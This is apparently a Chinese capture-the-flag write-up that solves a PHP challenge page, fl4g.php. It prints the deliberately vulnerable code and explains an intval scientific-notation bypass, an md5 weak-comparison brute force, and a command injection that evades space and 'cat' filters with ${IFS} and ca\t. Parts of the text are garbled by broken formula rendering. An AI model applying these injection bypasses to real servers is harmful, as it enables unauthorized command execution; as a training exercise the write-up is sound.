刚打开时乱码:
解决方法:firefox浏览器->地址栏点击右键->菜单栏->查看->修复文字编码
发现有bot的字样,打开robots.txt
发现fAke_f1agggg.php,打开
啥都没有,抓一下当前网页的包
发现 /fl4g.php,打开,发现代码
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
遇到die直接退出,所以为了防止遇到die,我们有三关要过
第一关:if(intval(KaTeX parse error: Expected 'EOF', got '&' at position 13: num) < 2020 &̲& intval(num + 1) > 2021)
intval() 函数用于获取变量的整数值
发现intval()函数在处理字符串型的科学计数法时,只输出e前面的数字
<?php
echo intval(1e10);
echo "\r\n";
echo intval("1e10");
echo "\r\n";
echo intval("1e10"+1);
?>
输出结果
10000000000
1
10000000001
发现$a+1
,如果$a
是字符串型的科学计数法,$a+1
后,$a
会强制转换为数字
所以,url:/fl4g.php?num=1e10
第二关:if (
m
d
5
=
=
m
d
5
(
md5==md5(
md5==md5(md5))
md5弱类型
借别人脚本跑一下:
import hashlib
for i in range(0,10**41):
i='0e'+str(i)
md5=hashlib.md5(i.encode()).hexdigest()
if md5[:2]=='0e' and md5[2:].isdigit():
print('md5:{} '.format(i))
break
结果:
md5:0e215962017
url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017
第三关:保证get_flag的值不能有空格,不能使用cat
strstr() 函数搜索字符串在另一字符串中的第一次出现。
查找 "Shanghai" 在 "I love Shanghai!" 中的第一次出现,并返回字符串的剩余部分:
<?php
echo strstr("I love Shanghai!","Shanghai");
?>
str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。
把字符串 "Hello world!" 中的字符 "WORLD"(不区分大小写)替换成 "Shanghai":
<?php
echo str_ireplace("WORLD","Shanghai","Hello world!");
?>
空格用$IFS$9
或${IFS}
代替
开始我使用ca\t${IFS}flag
却得不到flag
纠结了很久发现,要先使用&get_flag=ls
查看
然后使用&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
得到flag
payload:
/fl4g.php?num=2e5&md5=0e215962017&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag